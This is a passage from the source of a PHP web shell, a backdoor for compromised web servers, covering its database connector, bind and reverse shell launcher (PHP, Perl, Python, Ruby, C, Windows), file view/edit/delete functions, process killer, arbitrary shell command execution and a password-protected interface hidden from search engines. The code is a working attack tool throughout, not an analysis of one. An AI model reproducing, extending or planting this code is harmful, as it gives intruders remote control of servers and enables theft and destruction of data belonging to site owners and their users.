1453 <input type=\"submit\" name=\"".$sqltype."\" class=\"inputzbut\" value=\"Connect !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />
1454 <input type=\"hidden\" name=\"d\" value=\"".$cwd."\" />
1455 </form>
1456 </div>";
1457 }
1458 elseif($sqltype=="sqlite" || $sqltype=="sqlite3"){
1459 $s_result .= "<div class=\"mybox\"><h2>".$sqltitle."</h2>
1460 <form action=\"" . $_SERVER['PHP_SELF'] . "?db\" method=\"post\" />
1461 <table class=\"myboxtbl\">
1462 <tr><td style=\"width:170px;\">DB File</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqlite_file\" value=\"".$sqlite_file."\" /></td></tr>
1463 </table>
1464 <input type=\"submit\" name=\"".$sqltype."\" class=\"inputzbut\" value=\"Connect !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />
1465 <input type=\"hidden\" name=\"d\" value=\"".$cwd."\" />
1466 </form>
1467 </div>";
1468 }
1469 else{
1470 $s_result .= "<div class=\"mybox\"><h2>".$sqltitle."</h2>
1471 <form action=\"" . $_SERVER['PHP_SELF'] . "?db\" method=\"post\" />
1472 <table class=\"myboxtbl\">
1473 <tr><td style=\"width:170px;\">Host</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqlhost1\" value=\"".$sqlhost."\" /></td></tr>
1474 <tr><td>Username</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqluser\" value=\"".$sqluser."\" /></td></tr>
1475 <tr><td>Password</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"password\" name=\"sqlpass\" value=\"\" /></td></tr>
1476 <tr><td>Port (optional)</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqlport\" value=\"".$sqlport."\" /></td></tr>
1477 </table>
1478 <input type=\"submit\" name=\"".$sqltype."\" class=\"inputzbut\" value=\"Connect !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />
1479 </form>
1480 </div>";
1481 }
1482 }
1483
1484 }
1485 } // bind and reverse shell
1486 elseif(isset($_REQUEST['rs'])){
1487 // access to compiler/interpreter
1488 $s_python = check_access("python");
1489 $s_perl = check_access("perl");
1490 $s_ruby = check_access("ruby");
1491 $s_gcc = check_access("gcc");
1492 $s_java = check_access("java");
1493 //$s_server_ip = gethostbyname($_SERVER["HTTP_HOST"]);
1494 //$s_my_ip = $_SERVER['REMOTE_ADDR'];
1495 $rshost = $s_server_ip;
1496
1497 $rsport = "13123";
1498 // resources $rs_pl $rs_py $rs_rb $rs_c $rs_win
1499 $rspesana = "Press ' Go ! ' button and run ' nc <i>server_ip</i> <i>port</i> ' on your computer";
1500 $rspesanb = "Run ' nc -l -v -p <i>port</i> ' on your computer and press ' Go ! ' button";
1501
1502 //bind_pl bind_py bind_rb bind_c bind_win bind_php back_pl back_py back_rb back_c back_win back_php
1503 // resources $rs_pl $rs_py $rs_rb $rs_c $rs_win $rs_php
1504 $rsbind = array();
1505 $rsback = array();
1506
1507
1508 $rsbind["bind_php"] = "Bind Shell <span style=\"font-size:12px;color:#999;\">- php</span>";
1509 $rsback["back_php"] = "Reverse Shell <span style=\"font-size:12px;color:#999;\">- php</span>";
1510
1511 if($s_perl){
1512 $rsbind["bind_pl"] = "Bind Shell <span style=\"font-size:12px;color:#999;\">- perl</span>";
1513 $rsback["back_pl"] = "Reverse Shell <span style=\"font-size:12px;color:#999;\">- perl</span>";
1514 }
1515 if($s_python){
1516 $rsbind["bind_py"] = "Bind Shell <span style=\"font-size:12px;color:#999;\">- python</span>";
1517 $rsback["back_py"] = "Reverse Shell <span style=\"font-size:12px;color:#999;\">- python</span>";
1518 }
1519 if($s_ruby){
1520 $rsbind["bind_rb"] = "Bind Shell <span style=\"font-size:12px;color:#999;\">- ruby</span>";
1521 $rsback["back_rb"] = "Reverse Shell <span style=\"font-size:12px;color:#999;\">- ruby</span>";
1522 }
1523 if($s_win){
1524 $rsbind["bind_win"] = "Bind Shell <span style=\"font-size:12px;color:#999;\">- windows executable</span>";
1525 $rsback["back_win"] = "Reverse Shell <span style=\"font-size:12px;color:#999;\">- windows executable</span>";
1526 }
1527 else{
1528 $rsbind["bind_c"] = "Bind Shell <span style=\"font-size:12px;color:#999;\">- c</span>";
1529 $rsback["back_c"] = "Reverse Shell <span style=\"font-size:12px;color:#999;\">- c</span>";
1530 }
1531
1532 $rslist = array_merge($rsbind,$rsback);
1533
1534 if(!is_writable($cwd)) $s_result .= "<p class=\"rs_result\">Directory ".$cwd." is not writable, please change to a writable one</p>";
1535 $rs_err = "";
1536 foreach($rslist as $rstype=>$rstitle){
1537 $split = explode("_",$rstype);
1538 if($split[0]=="bind"){
1539 $rspesan = $rspesana;
1540 $rsdisabled = "disabled=\"disabled\"";
1541 $rstarget = $s_server_ip;
1542 $labelip = "Server IP";
1543 }
1544 elseif($split[0]=="back"){
1545 $rspesan = $rspesanb;
1546 $rsdisabled = "";
1547 $rstarget = $s_my_ip;
1548 $labelip = "Target IP";
1549 }
1550 if(isset($_REQUEST[$rstype])){
1551 if(isset($_REQUEST["rshost_".$rstype])) $rshost_ = ss($_REQUEST["rshost_".$rstype]);
1552 if(isset($_REQUEST["rsport_".$rstype])) $rsport_ = ss($_REQUEST["rsport_".$rstype]);
1553
1554 if($split[0]=="bind") $rstarget_packed = $rsport_;
1555 elseif($split[0]=="back") $rstarget_packed = $rsport_." ".$rshost_;
1556
1557 if($split[1]=="pl") $rscode = $rs_pl;
1558 elseif($split[1]=="py") $rscode = $rs_py;
1559 elseif($split[1]=="rb") $rscode = $rs_rb;
1560 elseif($split[1]=="c") $rscode = $rs_c;
1561 elseif($split[1]=="win") $rscode = $rs_win;
1562 elseif($split[1]=="php") $rscode = $rs_php;;
1563 $buff = rs($rstype,$rstarget_packed,$rscode);
1564 if($buff!="") $rs_err = "<p class=\"rs_result\">".htmlspecialchars($buff)."</p>";
1565 }
1566 $s_result .= "<div class=\"mybox\"><h2>".$rstitle."</h2>
1567 <form action=\"" . $_SERVER['PHP_SELF'] . "?rs\" method=\"post\" />
1568 <table class=\"myboxtbl\">
1569 <tr><td style=\"width:100px;\">".$labelip."</td><td><input ".$rsdisabled." style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"rshost_".$rstype."\" value=\"".$rstarget."\" /></td></tr>
1570 <tr><td>Port</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"rsport_".$rstype."\" value=\"".$rsport."\" /></td></tr>
1571 </table>
1572 <input type=\"submit\" name=\"".$rstype."\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />
1573 <span>".$rspesan."</span>
1574 <input type=\"hidden\" name=\"d\" value=\"".$cwd."\" />
1575 </form>
1576 </div>";
1577 }
1578 $s_result = $rs_err.$s_result;
1579 } // view file
1580 elseif(isset($_REQUEST['view'])){
1581 $f = ss($_REQUEST['view']);
1582 if(isset($fnew) && (trim($fnew)!="")) $f = $fnew;
1583 $owner = "";
1584 if(is_file($f)){
1585 if(!$s_win && $s_posix){
1586 $name = posix_getpwuid(fileowner($f));
1587 $group = posix_getgrgid(filegroup($f));
1588 $owner = "<tr><td>Owner</td><td>".$name['name']."<span class=\"gaya\"> : </span>".$group['name']."</td></tr>";
1589 }
1590 $filn = basename($f);
1591 $dlfile = get_archiver_available();
1592 $dlfile = str_replace("__dlpath__",$filn,$dlfile);
1593 $dlfile = str_replace("__dlcwd__",$cwd,$dlfile);
1594 $s_result .= "<table class=\"viewfile\" style=\"width:100%;\">
1595 <tr><td style=\"width:140px;\">Filename</td><td><span id=\"".cs($filn)."_link\">".$f."</span>
1596 <form action=\"" . $_SERVER['PHP_SELF'] . "?d=".$cwd."&view=".$f."\" method=\"post\" id=\"".cs($filn)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
1597 <input type=\"hidden\" name=\"oldname\" value=\"".$filn."\" style=\"margin:0;padding:0;\" />
1598 <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$filn."\" />
1599 <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
1600 <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\"
1601 onclick=\"tukar('".cs($filn)."_link','".cs($filn)."_form');\" />
1602 </form>
1603 </td></tr>
1604 <tr><td>Size</td><td>".gs($f)."</td></tr>
1605 <tr><td>Permission</td><td>".gp($f)."</td></tr>
1606 ".$owner."
1607 <tr><td>Create time</td><td>".date("d-M-Y H:i",filectime($f))."</td></tr>
1608 <tr><td>Last modified</td><td>".date("d-M-Y H:i",filemtime($f))."</td></tr>
1609 <tr><td>Last accessed</td><td>".date("d-M-Y H:i",fileatime($f))."</td></tr>
1610 <tr><td>Actions</td><td>
1611 <a href=\"?d=".$cwd."&edit=".$f."\">edit</a> |
1612 <a href=\"javascript:tukar('".cs($filn)."_link','".cs($filn)."_form');\">rename</a> |
1613 <a href=\"?d=".$cwd."&delete=".$f."\">delete</a> ".$dlfile."
1614 </td></tr>
1615 <tr><td>View</td><td>
1616 <a href=\"?d=".$cwd."&view=".$f."&type=text\">text</a> |
1617 <a href=\"?d=".$cwd."&view=".$f."&type=code\">code</a> |
1618 <a href=\"?d=".$cwd."&view=".$f."&type=image\">image</a></td></tr>
1619 </table>
1620 ";
1621 $t = "";
1622 $iinfo = @getimagesize($f);
1623 if(substr($filn,-3,3) == "php") $t = "code";
1624 if(is_array($iinfo)) $t = 'image';
1625
1626 if(isset($_REQUEST['type'])) $t = ss($_REQUEST['type']);
1627
1628 if($t=="image"){
1629 $width = (int) $iinfo[0];
1630 $height = (int) $iinfo[1];
1631 $imginfo = "Image type = ( ".$iinfo['mime']." )<br />
1632 Image Size = <span class=\"gaul\">( </span>".$width." x ".$height."<span class=\"gaul\"> )</span><br />";
1633 if($width > 800){
1634 $width = 800;
1635 $imglink = "<p><a href=\"?d=".$cwd."&img=".$filn."\" target=\"_blank\">
1636 <span class=\"gaul\">[ </span>view full size<span class=\"gaul\"> ]</span></a></p>";
1637 }
1638 else $imglink = "";
1639
1640 $s_result .= "<div class=\"viewfilecontent\" style=\"text-align:center;\">".$imglink."
1641 <img width=\"".$width."\" src=\"?d=".$cwd."&img=".$filn."\" alt=\"\" style=\"margin:8px auto;padding:0;border:0;\" /></div>";
1642
1643 }
1644 elseif($t=="code"){
1645 $s_result .= "<div class=\"viewfilecontent\">";
1646 $file = wordwrap(file_get_contents($f),160,"\n",true);
1647 $buff = highlight_string($file,true);
1648 $old = array("0000BB","000000","FF8000","DD0000", "007700");
1649 $new = array("4C83AF","888888", "87DF45", "EEEEEE" , "FF8000");
1650 $buff = str_replace($old,$new, $buff);
1651 $s_result .= $buff;
1652 $s_result .= "</div>";
1653 }
1654 else {
1655 $s_result .= "<pre style=\"padding: 3px 8px 0 8px;\" class=\"viewfilecontent\">";
1656 $s_result .= str_replace("<","<",str_replace(">",">",(wordwrap(file_get_contents($f),160,"\n",true))));
1657 $s_result .= "</pre>";
1658 }
1659 }
1660 elseif(is_dir($f)){
1661 chdir($f);
1662 $cwd = cp(getcwd());
1663 $s_result .= showdir($cwd);
1664 }
1665
1666 } // edit file
1667 elseif(isset($_REQUEST['edit'])){
1668 $f = ss($_REQUEST['edit']);
1669 $fc = "";
1670 $fcs = "";
1671
1672 if(is_file($f)) $fc = file_get_contents($f);
1673 if(isset($_REQUEST['fcsubmit'])){
1674 $fc = ssc($_REQUEST['fc']);
1675 if($filez = fopen($f,"w")){
1676 $time = date("d-M-Y H:i",time());
1677 if(fwrite($filez,$fc)!==false) $fcs = "file saved <span class=\"gaya\">@</span> ".$time;
1678 else $fcs = "failed to save";
1679 fclose($filez);
1680 }
1681 else $fcs = "permission denied";
1682 }
1683 $s_result .= " <form action=\"" . $_SERVER['PHP_SELF'] . "\" method=\"post\">
1684 <textarea id=\"fc\" name=\"fc\" class=\"evalcode\">".htmlspecialchars($fc)."</textarea>
1685 <p><input type=\"text\" class=\"inputz\" style=\"width:98%;\" name=\"edit\" value=\"".$f."\" /></p>
1686 <p><input type=\"submit\" name=\"fcsubmit\" class=\"inputzbut\" value=\"Save !\" style=\"width:120px;height:30px;\" />
1687 ".$fcs."</p>
1688 <input type=\"hidden\" name=\"d\" value=\"".$cwd."\" />
1689 </form>
1690 ";
1691
1692 } // task manager
1693 elseif(isset($_REQUEST['ps'])){
1694 $buff = "";
1695 // kill process specified by pid
1696 if(isset($_REQUEST['pid'])){
1697 $p = ss($_REQUEST['pid']);
1698 if(function_exists("posix_kill")) $buff = (posix_kill($p,'9'))? "Process with pid ".$p." has been successfully killed":"Unable to kill process with pid ".$p;
1699 else{
1700 if(!$s_win) $buff = exe("kill -9 ".$p);
1701 else $buff = exe("taskkill /F /PID ".$p);
1702 }
1703 }
1704
1705 if(!$s_win) $h = "ps aux";
1706 else $h = "tasklist /V /FO csv";
1707 $wcount = 11;
1708 $wexplode = " ";
1709 if($s_win) $wexplode = "\",\"";
1710
1711
1712 $res = exe($h);
1713 if(trim($res)=='') $s_result = "<p class=\"rs_result\">Error getting process list</p>";
1714 else{
1715 if($buff!="") $s_result = "<p class=\"rs_result\">".$buff."</p>";
1716 $s_result .= "<table class=\"explore sortable\">";
1717 if(!$s_win) $res = preg_replace('#\ +#',' ',$res);
1718
1719 $psarr = explode("\n",$res);
1720 $fi = true;
1721 $tblcount = 0;
1722
1723 $check = explode($wexplode,$psarr[0]);
1724 $wcount = count($check);
1725
1726 foreach($psarr as $psa){
1727 if(trim($psa)!=''){
1728 if($fi){
1729 $fi = false;
1730 $psln = explode($wexplode,$psa,$wcount);
1731 $s_result .= "<tr><th>action</th>";
1732 foreach($psln as $p){
1733 $s_result .= "<th>".trim(trim(strtolower($p)),"\"")."</th>";
1734 }
1735 $s_result .= "</tr>";
1736 }
1737 else{
1738 $psln = explode($wexplode,$psa,$wcount);
1739 $s_result .= "<tr>";
1740 $tblcount = 0;
1741 foreach($psln as $p){
1742 if(trim($p)=="") $p = " ";
1743 if($tblcount == 0){
1744 $s_result .= "<td style=\"text-align:center;\"><a href=\"?ps&d=".$cwd."&pid=".trim(trim($psln[1]),"\"")."\">kill</a></td>
1745 <td style=\"text-align:center;\">".trim(trim($p),"\"")."</td>";
1746 $tblcount++;
1747 }
1748 else{
1749 $tblcount++;
1750 if($tblcount == count($psln)) $s_result .= "<td style=\"text-align:left;\">".trim(trim($p), "\"")."</td>";
1751 else $s_result .= "<td style=\"text-align:center;\">".trim(trim($p), "\"")."</td>";
1752 }
1753 }
1754 $s_result .= "</tr>";
1755 }
1756 }
1757 }
1758 $s_result .= "</table>";
1759 }
1760 }
1761 else{
1762 if(isset($_REQUEST['cmd'])){
1763 $cmd = ss($_REQUEST['cmd']);
1764 if(strlen($cmd) > 0){
1765 if(preg_match('#^cd(\ )+(.*)$#',$cmd,$r)){
1766 $nd = trim($r[2]);
1767 if(is_dir($nd)){
1768 chdir($nd);
1769 $cwd = cp(getcwd());
1770 $s_result .= showdir($cwd);
1771 }
1772 elseif(is_dir($cwd.$nd)){
1773 chdir($cwd.$nd);
1774 $cwd = cp(getcwd());
1775 $s_result .= showdir($cwd);
1776 }
1777 else $s_result .= "<pre>".$nd." is not a directory"."</pre>";
1778 }
1779 else{
1780 $s_r = htmlspecialchars(exe($cmd));
1781 if($s_r != '') $s_result .= "<pre>".$s_r."</pre>";
1782 else $s_result .= showdir($cwd);
1783 }
1784 }
1785 else $s_result .= showdir($cwd);
1786 }
1787 else{
1788 if(!empty($dirmsg)) $s_result .= "<p class=\"rs_result\">".$dirmsg."</p>";
1789 $s_result .= showdir($cwd);
1790 }
1791 }
1792
1793 // print useful info
1794 $s_info = "<table class=\"headtbl\"><tr><td>".$s_system."</td></tr>";
1795 $s_info .= "<tr><td>".$s_software."</td></tr>";
1796 $s_info .= "<tr><td>server ip : ".$s_server_ip."<span class=\"gaya\"> | </span>your ip : ".$s_my_ip;
1797 $s_info .= "<span class=\"gaya\"> | </span> Time @ Server : ".date("d M Y H:i:s",time());
1798 $s_info .= "
1799 </td></tr>
1800 <tr><td style=\"text-align:left;\">
1801 <table class=\"headtbls\"><tr>
1802 <td>".trim($letters)."</td>
1803 <td>
1804 <span id=\"chpwd\">
1805 <a href=\"javascript:tukar('chpwd','chpwdform')\">
1806 <img height=\"16px\" width=\"16px\" src=\"" . $_SERVER['PHP_SELF'] . "?favicon\" alt=\"Change\" style=\"vertical-align:middle;margin:6px 0;border:0;\" />
1807 </a>".swd($cwd)."</span>
1808 <form action=\"" . $_SERVER['PHP_SELF'] . "\" method=\"post\" style=\"margin:0;padding:0;\">
1809 <span class=\"sembunyi\" id=\"chpwdform\">
1810 <a href=\"javascript:tukar('chpwdform','chpwd');\">
1811 <img height=\"16px\" width=\"16px\" src=\"" . $_SERVER['PHP_SELF'] . "?favicon\" alt=\"Change\" style=\"vertical-align:middle;margin:6px 0;border:0;\" />
1812 </a>
1813 <input type=\"hidden\" name=\"d\" class=\"inputz\" style=\"width:300px;\" value=\"".cp($cwd)."\" />
1814 <input type=\"text\" name=\"view\" class=\"inputz\" style=\"width:300px;\" value=\"".$cwd."\" />
1815 <input class=\"inputzbut\" type=\"submit\" name=\"submit\" value=\"view file / folder\" />
1816 <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('chpwdform','chpwd');\" />
1817 </form>
1818 </span>
1819 </td></tr>
1820 </table>
1821 </td></tr>
1822 </table>";
1823}
1824?><!DOCTYPE html>
1825<html>
1826<head>
1827<title><?php echo $s_title; ?></title>
1828<meta name="robots" content="noindex, nofollow, noarchive">
1829<link rel="SHORTCUT ICON" href="<?php echo $_SERVER['PHP_SELF']."?favicon"; ?>">
1830<link href="http://fonts.googleapis.com/css?family=Ubuntu+Mono" rel="stylesheet" type="text/css">
1831<style type="text/css"><?php echo gzinflate(base64_decode($style)); ?></style>
1832<script type="text/javascript" src="<?php echo $_SERVER['PHP_SELF']."?sorttable"; ?>"></script>
1833<script type="text/javascript">
1834window.onload=function(){
1835 init();
1836}
1837function init(){<?php if(isset($_REQUEST['cmd'])) echo "if(document.getElementById('cmd')) document.getElementById('cmd').focus();"; ?>}
1838function tukar(l,b){
1839 if(document.getElementById(l)) document.getElementById(l).style.display = 'none';
1840 if(document.getElementById(b)) document.getElementById(b).style.display = 'block';
1841 if(document.getElementById(l + '_')) document.getElementById(l + '_').focus();
1842}
1843function toggle(b){
1844 if(document.getElementById(b)){
1845 if(document.getElementById(b).style.display == 'block') document.getElementById(b).style.display = 'none';
1846 else document.getElementById(b).style.display = 'block'
1847 }
1848}
1849function clickcmd(){
1850 var buff = document.getElementById('cmd');
1851 if(buff.value == '- shell command -') buff.value = '';
1852}
1853function download(what){
1854 what.form.submit();
1855 what.selectedIndex=0;
1856}
1857function cancelBubble(e) {
1858 var evt = e ? e:window.event;
1859 if(evt.stopPropagation) evt.stopPropagation();
1860 if(evt.cancelBubble!=null) evt.cancelBubble = true;
1861}
1862function xplgo(target){
1863 var t = (document.all) ? document.selection.createRange().text : document.getSelection();
1864 if(t.toString().length==0) window.location='?d='+target;
1865}
1866</script>
1867</head>
1868<body>
1869<table id="main"><tr><td><?php if($s_auth){ ?>
1870 <div><table id="header"><tr><td style="width:80px;"><table><tr><td><h1><a href="?"><?php echo $s_name; ?></a></h1></td></tr><tr><td style="text-align:right;"><div class="ver"><?php echo $s_ver; ?></div></td></tr></table></td>
1871 <td><div class="headinfo"><?php echo $s_info; ?></div></td></tr></table>
1872 </div>
1873 <div style="clear:both;"></div>
1874 <div id="menu">
1875 <table style="width:100%;"><tr>
1876 <td><a href="?&d=<?php echo $cwd; ?>" title="Explorer"><div class="menumi">xpl</div></a></td>
1877 <td><a href="?ps&d=<?php echo $cwd; ?>" title="Display process status"><div class="menumi">ps</div></a></td>
1878 <td><a href="?eval&d=<?php echo $cwd; ?>" title="Execute code"><div class="menumi">eval</div></a></td>
1879 <td><a href="?info&d=<?php echo $cwd; ?>" title="Information about server"><div class="menumi">info</div></a></td>
1880 <td><a href="?db&d=<?php echo $cwd; ?>" title="Connect to database"><div class="menumi">db</div></a></td>
1881 <td><a href="?rs&d=<?php echo $cwd; ?>" title="Remote Shell"><div class="menumi">rs</div></a></td>
1882 <td style="width:100%;padding:0 0 0 6px;">
1883 <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"><span class="prompt"><?php echo $s_prompt; ?></span>
1884 <input id="cmd" onclick="clickcmd();" class="inputz" type="text" name="cmd" style="width:70%;" value="<?php
1885if(isset($_REQUEST['cmd'])) echo "";
1886else echo "- shell command -";
1887?>" />
1888 <noscript><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:80px;" /></noscript>
1889 <input type="hidden" name="d" value="<?php echo $cwd; ?>" />
1890 </form>
1891 </td>
1892 </tr>
1893 </table>
1894 </div>
1895 <div id="content" id="box_shell">
1896 <div id="result"><?php echo $s_result; ?></div>
1897 </div><?php }
1898else{ ?>
1899 <div style="width:100%;text-align:center;">
1900
1901 <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
1902 <img src="?favicon" style="margin:2px;vertical-align:middle;" />
1903 <?php echo $s_name; ?> <span class="gaya"><?php echo $s_ver; ?></span><input id="login" class="inputz" type="password" name="login" style="width:120px;" value="" />
1904 <input class="inputzbut" type="submit" value="Go !" name="submitlogin" style="width:80px;" />
1905 </form>
1906 </div>
1907
1908<?php } ?>
1909</td></tr></table>
1910<p class="footer">Jayalah Indonesiaku ©<?php echo date("Y",time())." ".$s_name; ?> ( <?php
1911$mtime = explode(" ",microtime());
1912$s_end = (float)$mtime[0] + (float)$mtime[1]; // to calculate script execution time
1913echo round($s_end-$s_start,3); ?> secs )</p>
1914</body>
1915</html>